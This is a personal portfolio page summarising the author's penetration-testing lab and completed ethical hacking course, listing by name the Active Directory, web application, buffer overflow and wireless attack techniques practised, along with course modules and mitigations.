.

Attacking Networks, Web Applications, CTF Machines, and Exploiting Buffer Overflows

Using VirtualBox, I built an entire penetration testing lab that allowed me to successfully attack Active Directory, web applications, and CTF (capture the flag) machines. Additionally, I conducted exploit development which led to the successful identification and exploitation of a buffer overflow vulnerability. I performed reconnaissance, scanning, and enumeration using: Nmap, Nessus, OWASP Amass, PowerView, Bloodhound, Airodump-ng, directory busting tools, OSINT tools, etc. I attacked Active Directory using: EternalBlue (MS17-010), LLMNR poisoning, SMB relays, IPv6 DNS takeovers, pass-the-pass, pass-the-hash, token impersonation, Kerberoasting, GPP/cPassword attacks, URL file attacks, PrintNightmare (CVE-2021-1675), Mimikatz, Golden Ticket attacks, ZeroLogon, etc. With an emphasis on the OWASP Top 10, I attacked web applications using: SQL injections, XML external entity (XXE) attacks, cross-site scripting (XSS), credential stuffing, password spraying, brute forcing, etc. Along the way, I learned how to use Kali Linux and many other exploitation tools such as Metasploit and Burp Suite.

This was all made possible thanks this course by TCM Security: Practical Ethical Hacking. Since it is entirely focused on valuable hands-on experience, the course is essentially an entire project that prepares you for a penetration testing job. This page contains my documented progress and learning throughout the entire full project/course.

Although I’ve finished the entire project/course, I am extending my learning beyond its scope by continuing to use the penetration testing lab I made to experiment with other new attacks, tools, and tactics.

<overview>

I've broken down this project/course into separate parts for easier documentation. Click any of the parts below for more details about what I worked on.

DONE
// Review of prerequisites

Content:
• Computer networking concepts needed for ethical hacking.
• Setting up a Kali Linux attack box via VirtualBox.
• The Linux OS, its terminal, and shell scripting.
• Python.

DONE
// This is where the fun begins!

Content:
• The 5 stages of ethical hacking.
• Setting up a victim box via VirtualBox.
• Reconnaissance / information gathering.
• Scanning and enumeration.
• Exploitation basics.

DONE
// Hacking 5 new victim machines

Content:
• Setting up 5 new victim machines (Linux + Windows) via VirtualBox.
• Compromising all 5 machines.
• Using EternalBlue to exploit the notorious MS17-010 vulnerability.
• Privilege escalation to get root/system access.
• More ethical hacking tools, tactics, and thought processes.

DONE
// Buffer Overflows

Content:
• A deep dive into computer memory and registers to understand how buffer overflows work.
• The buffer overflow exploit development process: debugging programs at the hexadecimal level, spiking and fuzzing, using pattern strings, finding bad characters, identifying vulnerable modules, and more.
• Manually writing buffer overflow exploitation code in Python to gain an administrator shell.

DONE
// Internal Network Pentesting

Content:
• Setting up an Active Directory pentesting lab environment.
• Initial attack vectors: LLMNR poisoning, capturing hashes, hash cracking, SMB relays, IPv6 DNS takeovers, hacking printers, and popping shells.
• Post-compromise enumeration: PowerView and Bloodhound.
• Post-compromise attacks: pass-the-pass, hash dumping, pass-the-hash, token impersonation, Kerberoasting, GPP/cPassword attacks, URL file attacks, PrintNightmare (CVE-2021-1675), Mimikatz, Golden Ticket attacks, and ZeroLogon.
• Mitigations against Active Directory attacks.

DONE
// The OWASP Top 10

Content:
• Setting up a web application pentesting lab environment.
• Web application enumeration: tools and methods of automation via shell scripting.
• The OWASP Top 10: exploring and abusing the top 10 most critical web app security vulnerabilities.
• Mitigations against the OWASP Top 10.

DONE
// Hacking wireless networks

Content:
• Setting up a wireless network pentesting lab environment.
• What to look for during a wireless pentest assessment.
• Capturing and cracking WPA2 PSK passwords.

{$}

<contact_me>

Fill out the form below to reach out to me!